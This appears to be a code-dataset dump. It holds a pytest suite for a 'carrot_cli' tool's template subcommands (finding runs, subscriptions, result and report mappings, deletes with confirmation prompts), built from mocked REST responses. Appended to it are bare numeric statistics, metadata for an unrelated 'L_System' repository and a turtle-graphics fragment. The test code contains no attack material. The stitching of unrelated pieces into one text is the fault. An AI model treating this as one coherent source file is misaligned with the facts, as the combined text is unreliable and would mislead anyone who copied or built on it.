"eval_cromwell_job_id": "03958293-6b71-429c-a4de-8e90222488cd",
"name": "Queen of Bright Moon run",
"test_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"run_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_runs", "986325ba-06fe-4b1a-9e96-47d4f36bf819"],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No run found",
"status": 404,
"detail": "No runs found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find_runs",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"--test_input",
"nonexistent_file.json",
],
"params": [],
"logging": "Encountered FileNotFound error when trying to read nonexistent_file.json",
},
]
)
def find_runs_data(request):
    """Parametrized fixture: stub runs.find for the `template find_runs` tests.

    Returns the parametrization dict; cases with an empty "params" list are
    expected to fail (e.g. unreadable --test_input file) before the REST call.
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(runs).find(...).thenReturn(None)
    # Mock up request response only when we expect the call to be made
    if request.param["params"]:
        # First positional arg is the parent entity type; unpack the rest
        # instead of indexing params[0]..params[14] one by one
        mockito.when(runs).find("templates", *request.param["params"]).thenReturn(
            request.param["return"]
        )
    return request.param
def test_find_runs(find_runs_data, caplog):
    """`template find_runs` prints the stubbed response, or logs a file error."""
    outcome = CliRunner().invoke(carrot, find_runs_data["args"])
    expected_log = find_runs_data.get("logging")
    if expected_log is not None:
        assert expected_log in caplog.text
    else:
        assert outcome.output == find_runs_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"subscribe",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"netossa@example.com",
],
"params": ["cd987859-06fe-4b1a-9e96-47d4f36bf819", "netossa@example.com"],
"return": json.dumps(
{
"subscription_id": "361b3b95-4a6e-40d9-bd98-f92b2959864e",
"entity_type": "template",
"entity_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"email": "netossa@example.com",
"created_at": "2020-09-23T19:41:46.839880",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"subscribe",
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"spinnerella@example.com",
],
"params": [
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"spinnerella@example.com",
],
"return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "subscribe", "89657859-06fe-4b1a-9e96-47d4f36bf819"],
"params": ["89657859-06fe-4b1a-9e96-47d4f36bf819", "frosta@example.com"],
"return": json.dumps(
{
"subscription_id": "361b3b95-4a6e-40d9-bd98-f92b2959864e",
"entity_type": "template",
"entity_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"email": "frosta@example.com",
"created_at": "2020-09-23T19:41:46.839880",
},
indent=4,
sort_keys=True,
),
},
]
)
def subscribe_data(request):
    """Parametrized fixture: stub templates.subscribe plus a configured email.

    The configured email backs the case where --email is omitted on the CLI.
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(templates).subscribe(...).thenReturn(None)
    mockito.when(config).load_var_no_error("email").thenReturn("frosta@example.com")
    # Mock up request response; unpack (id, email) instead of indexing
    mockito.when(templates).subscribe(*request.param["params"]).thenReturn(
        request.param["return"]
    )
    return request.param
def test_subscribe(subscribe_data):
    """`template subscribe` prints the stubbed response followed by a newline."""
    expected = subscribe_data["return"] + "\n"
    invocation = CliRunner().invoke(carrot, subscribe_data["args"])
    assert invocation.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"unsubscribe",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"netossa@example.com",
],
"params": ["cd987859-06fe-4b1a-9e96-47d4f36bf819", "netossa@example.com"],
"return": json.dumps(
{"message": "Successfully deleted 1 row(s)"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"unsubscribe",
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"--email",
"spinnerella@example.com",
],
"params": [
"89657859-06fe-4b1a-9e96-47d4f36bf819",
"spinnerella@example.com",
],
"return": json.dumps(
{
"title": "No subscription found",
"status": 404,
"detail": "No subscription found for the specified parameters",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "unsubscribe", "89657859-06fe-4b1a-9e96-47d4f36bf819"],
"params": ["89657859-06fe-4b1a-9e96-47d4f36bf819", "frosta@example.com"],
"return": json.dumps(
{"message": "Successfully deleted 1 row(s)"}, indent=4, sort_keys=True
),
},
]
)
def unsubscribe_data(request):
    """Parametrized fixture: stub templates.unsubscribe plus a configured email.

    The configured email backs the case where --email is omitted on the CLI.
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(templates).unsubscribe(...).thenReturn(None)
    mockito.when(config).load_var_no_error("email").thenReturn("frosta@example.com")
    # Mock up request response; unpack (id, email) instead of indexing
    mockito.when(templates).unsubscribe(*request.param["params"]).thenReturn(
        request.param["return"]
    )
    return request.param
def test_unsubscribe(unsubscribe_data):
    """`template unsubscribe` prints the stubbed response followed by a newline."""
    expected = unsubscribe_data["return"] + "\n"
    invocation = CliRunner().invoke(carrot, unsubscribe_data["args"])
    assert invocation.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"map_to_result",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"out_horde_tanks",
"--created_by",
"adora@example.com",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"out_horde_tanks",
"adora@example.com",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "out_horde_tanks",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"map_to_result",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"out_horde_tanks",
],
"params": [],
"logging": "No email config variable set. If a value is not specified for --created by, "
"there must be a value set for email.",
},
{
"args": ["template", "map_to_result"],
"params": [],
"return": "Usage: carrot_cli template map_to_result [OPTIONS] ID RESULT_ID RESULT_KEY\n"
"Try 'carrot_cli template map_to_result --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def map_to_result_data(request):
    """Parametrized fixture: stub template_results.create_map for `map_to_result` tests.

    Returns the parametrization dict; cases with an empty "params" list are
    expected to fail (missing argument / no email) before the REST call.
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(template_results).create_map(...).thenReturn(None)
    # Mock up request response only if we expect it to get that far
    if request.param["params"]:
        # Unpack instead of indexing params[0]..params[3] one by one
        mockito.when(template_results).create_map(*request.param["params"]).thenReturn(
            request.param["return"]
        )
    return request.param
def test_map_to_result(map_to_result_data, caplog):
    """`template map_to_result` prints the stubbed response, or logs a config error."""
    outcome = CliRunner().invoke(carrot, map_to_result_data["args"])
    expected_log = map_to_result_data.get("logging")
    if expected_log is not None:
        assert expected_log in caplog.text
    else:
        assert outcome.output == map_to_result_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"find_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "out_horde_tanks",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_result_map_by_id"],
"params": [],
"return": "Usage: carrot_cli template find_result_map_by_id [OPTIONS] ID RESULT_ID\n"
"Try 'carrot_cli template find_result_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def find_result_map_by_id_data(request):
    """Parametrized fixture: stub template_results.find_map_by_ids.

    Returns the parametrization dict; the empty-"params" case is expected to
    fail argument parsing before reaching the REST layer.
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(template_results).find_map_by_ids(...).thenReturn(None)
    # Mock up request response only if we expect it to get that far
    if request.param["params"]:
        # Unpack (template_id, result_id) instead of indexing
        mockito.when(template_results).find_map_by_ids(
            *request.param["params"]
        ).thenReturn(request.param["return"])
    return request.param
def test_find_result_map_by_id(find_result_map_by_id_data):
    """`template find_result_map_by_id` prints the stubbed response plus a newline."""
    expected = find_result_map_by_id_data["return"] + "\n"
    invocation = CliRunner().invoke(carrot, find_result_map_by_id_data["args"])
    assert invocation.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"find_result_maps",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--result_id",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--result_key",
"sword_of_protection_key",
"--created_by",
"adora@example.com",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(result_key)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"sword_of_protection_key",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"adora@example.com",
"asc(result_key)",
1,
0,
],
"return": json.dumps(
[
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find_result_maps",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No template_results found",
"status": 404,
"detail": "No template_results found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_result_maps_data(request):
    """Parametrized fixture: stub template_results.find_maps for `find_result_maps` tests.

    Returns the parametrization dict (CLI args, expected REST params, response).
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(template_results).find_maps(...).thenReturn(None)
    # Mock the one call whose argument list matches this case's expected params;
    # unpacking replaces the error-prone params[0]..params[8] indexing
    mockito.when(template_results).find_maps(*request.param["params"]).thenReturn(
        request.param["return"]
    )
    return request.param
def test_find_result_maps(find_result_maps_data):
    """`template find_result_maps` prints the stubbed response plus a newline."""
    expected = find_result_maps_data["return"] + "\n"
    invocation = CliRunner().invoke(carrot, find_result_maps_data["args"])
    assert invocation.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_result_map_by_id",
"-y",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
"interactive": {
"input": "y",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"result with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: y\n",
},
},
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"result_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"result_key": "sword_of_protection_key",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": "",
"interactive": {
"input": "n",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"result with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: n",
},
"logging": "Okay, aborting delete operation",
},
{
"args": [
"template",
"delete_result_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"title": "No template_result found",
"status": 404,
"detail": "No template_result found with the specified ID",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{
"title": "No template_result found",
"status": 404,
"detail": "No template_result found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "delete_result_map_by_id"],
"ids": [],
"email": "adora@example.com",
"return": "Usage: carrot_cli template delete_result_map_by_id [OPTIONS] ID RESULT_ID\n"
"Try 'carrot_cli template delete_result_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def delete_result_map_by_id_data(request):
    """Fixture: wire up the config email and template_results mocks for one case.

    Stubs delete_map_by_ids/find_map_by_ids only when the case supplies ids,
    so the missing-argument case never reaches the mocked layer.
    """
    case = request.param
    # The delete command reads the user's email from config before deciding to prompt.
    mockito.when(config).load_var("email").thenReturn(case["email"])
    # Default both calls to None so only the expected id pair gets a real answer.
    mockito.when(template_results).delete_map_by_ids(...).thenReturn(None)
    mockito.when(template_results).find_map_by_ids(...).thenReturn(None)
    if case["ids"]:
        ids = case["ids"]
        mockito.when(template_results).delete_map_by_ids(*ids).thenReturn(
            case["return"]
        )
        mockito.when(template_results).find_map_by_ids(*ids).thenReturn(
            case["find_return"]
        )
    return case
def test_delete_result_map_by_id(delete_result_map_by_id_data, caplog):
    """Run the delete command, covering both interactive-prompt and plain paths."""
    data = delete_result_map_by_id_data
    caplog.set_level(logging.INFO)
    runner = CliRunner()
    interactive = data.get("interactive")
    if interactive is not None:
        # Feed the y/n answer to the confirmation prompt; the prompt text is
        # echoed ahead of the command's normal output.
        outcome = runner.invoke(carrot, data["args"], input=interactive["input"])
        assert outcome.output == interactive["message"] + data["return"] + "\n"
    else:
        outcome = runner.invoke(carrot, data["args"])
        assert outcome.output == data["return"] + "\n"
    # Cases that abort also assert on an expected log line.
    if "logging" in data:
        assert data["logging"] in caplog.text
@pytest.fixture(
params=[
{
"args": [
"template",
"map_to_report",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--created_by",
"adora@example.com",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"adora@example.com",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"map_to_report",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"params": [],
"logging": "No email config variable set. If a value is not specified for --created by, "
"there must be a value set for email.",
},
{
"args": ["template", "map_to_report"],
"params": [],
"return": "Usage: carrot_cli template map_to_report [OPTIONS] ID REPORT_ID\n"
"Try 'carrot_cli template map_to_report --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def map_to_report_data(request):
    """Fixture: stub template_reports.create_map for one parametrized case.

    Cases with an empty params list (missing email / missing argument) never
    reach the mocked layer, so only the default None stub is installed then.
    """
    case = request.param
    # Default every create_map call to None so only the expected call answers.
    mockito.when(template_reports).create_map(...).thenReturn(None)
    if case["params"]:
        mockito.when(template_reports).create_map(*case["params"]).thenReturn(
            case["return"]
        )
    return case
def test_map_to_report(map_to_report_data, caplog):
    """Invoke map_to_report; check either the emitted log line or the output."""
    data = map_to_report_data
    outcome = CliRunner().invoke(carrot, data["args"])
    if "logging" in data:
        # Missing-email case: the command logs instead of printing a response.
        assert data["logging"] in caplog.text
    else:
        assert outcome.output == data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"find_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_report_map_by_id"],
"params": [],
"return": "Usage: carrot_cli template find_report_map_by_id [OPTIONS] ID REPORT_ID\n"
"Try 'carrot_cli template find_report_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def find_report_map_by_id_data(request):
    """Fixture: stub template_reports.find_map_by_ids for one parametrized case."""
    case = request.param
    # Default every find_map_by_ids call to None so only the expected pair answers.
    mockito.when(template_reports).find_map_by_ids(...).thenReturn(None)
    if case["params"]:
        mockito.when(template_reports).find_map_by_ids(*case["params"]).thenReturn(
            case["return"]
        )
    return case
def test_find_report_map_by_id(find_report_map_by_id_data):
    """Invoke the CLI and compare its stdout to the canned response plus newline."""
    expected = find_report_map_by_id_data["return"] + "\n"
    outcome = CliRunner().invoke(carrot, find_report_map_by_id_data["args"])
    assert outcome.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"find_report_maps",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--report_id",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--created_by",
"adora@example.com",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(input_map)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"adora@example.com",
"asc(input_map)",
1,
0,
],
"return": json.dumps(
[
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find_report_maps",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No template_reports found",
"status": 404,
"detail": "No template_reports found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_report_maps_data(request):
    """Fixture: stub template_reports.find_maps for one parametrized case.

    Every case carries a full eight-element params list (defaults filled in
    with empty strings and the 20/0 limit/offset), so find_maps is always stubbed.
    """
    case = request.param
    # Default every find_maps call to None so only the expected combination answers.
    mockito.when(template_reports).find_maps(...).thenReturn(None)
    # Stub the one exact parameter combination this case expects.
    mockito.when(template_reports).find_maps(*case["params"]).thenReturn(
        case["return"]
    )
    return case
def test_find_report_maps(find_report_maps_data):
    """Invoke the CLI and compare its stdout to the canned response plus newline."""
    expected = find_report_maps_data["return"] + "\n"
    outcome = CliRunner().invoke(carrot, find_report_maps_data["args"])
    assert outcome.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"delete_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
"email": "rogelio@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_report_map_by_id",
"-y",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "rogelio@example.com",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
"interactive": {
"input": "y",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"report with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: y\n",
},
},
{
"args": [
"template",
"delete_report_map_by_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"ids": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
],
"find_return": json.dumps(
{
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"report_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"input_map": {"section1": {"input1": "val1"}},
"created_at": "2020-09-24T19:07:59.311462",
"created_by": "adora@example.com",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": "",
"interactive": {
"input": "n",
"message": "Mapping for template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 and "
"report with id 3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8 was created by adora@example.com. Are "
"you sure you want to delete? [y/N]: n",
},
"logging": "Okay, aborting delete operation",
},
{
"args": ["template", "delete_report_map_by_id"],
"ids": [],
"email": "rogelio@example.com",
"return": "Usage: carrot_cli template delete_report_map_by_id [OPTIONS] ID REPORT_ID\n"
"Try 'carrot_cli template delete_report_map_by_id --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def delete_report_map_by_id_data(request):
    """Fixture: wire up the config email and template_reports mocks for one case.

    Stubs delete_map_by_ids/find_map_by_ids only when the case supplies ids,
    so the missing-argument case never reaches the mocked layer.
    """
    case = request.param
    # The delete command reads the user's email from config before deciding to prompt.
    mockito.when(config).load_var("email").thenReturn(case["email"])
    # Default both calls to None so only the expected id pair gets a real answer.
    mockito.when(template_reports).delete_map_by_ids(...).thenReturn(None)
    mockito.when(template_reports).find_map_by_ids(...).thenReturn(None)
    if case["ids"]:
        ids = case["ids"]
        mockito.when(template_reports).delete_map_by_ids(*ids).thenReturn(
            case["return"]
        )
        mockito.when(template_reports).find_map_by_ids(*ids).thenReturn(
            case["find_return"]
        )
    return case
def test_delete_report_map_by_id(delete_report_map_by_id_data, caplog):
    """Run the delete command, covering both interactive-prompt and plain paths."""
    data = delete_report_map_by_id_data
    caplog.set_level(logging.INFO)
    runner = CliRunner()
    interactive = data.get("interactive")
    if interactive is not None:
        # Feed the y/n answer to the confirmation prompt; the prompt text is
        # echoed ahead of the command's normal output.
        outcome = runner.invoke(carrot, data["args"], input=interactive["input"])
        assert outcome.output == interactive["message"] + data["return"] + "\n"
    else:
        outcome = runner.invoke(carrot, data["args"])
        assert outcome.output == data["return"] + "\n"
    # Cases that abort also assert on an expected log line.
    if "logging" in data:
        assert data["logging"] in caplog.text
| 36.869933
| 117
| 0.490286
| 5,884
| 60,946
| 4.926411
| 0.045377
| 0.053403
| 0.042226
| 0.084452
| 0.943043
| 0.921275
| 0.899162
| 0.869562
| 0.842999
| 0.819747
| 0
| 0.117798
| 0.380025
| 60,946
| 1,652
| 118
| 36.892252
| 0.649358
| 0.042168
| 0
| 0.719663
| 0
| 0.003894
| 0.350465
| 0.157695
| 0
| 0
| 0
| 0
| 0.016872
| 1
| 0.022064
| false
| 0
| 0.005191
| 0
| 0.037638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63c22af98d528de2eb18bb4142012d9e20412cc5
| 316,580
|
py
|
Python
|
L_System Python Projet/fichierDeSortie.py
|
Madaxuorel/Modelisation-L-Systems
|
bfbc745e71af87a1201530fd89b0e3694cf2d030
|
[
"MIT"
] | 1
|
2022-03-06T23:09:06.000Z
|
2022-03-06T23:09:06.000Z
|
L_System Python Projet/fichierDeSortie.py
|
Madaxuorel/Modelisation-L-Systems
|
bfbc745e71af87a1201530fd89b0e3694cf2d030
|
[
"MIT"
] | null | null | null |
L_System Python Projet/fichierDeSortie.py
|
Madaxuorel/Modelisation-L-Systems
|
bfbc745e71af87a1201530fd89b0e3694cf2d030
|
[
"MIT"
] | null | null | null |
from turtle import *
color('black')
speed(0)
left(22.5) ;
left(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((6.12,14.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((6.12,14.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((6.12,14.78), 67.5)];
left(22.5) ;
pd(), fd(8.0) ;
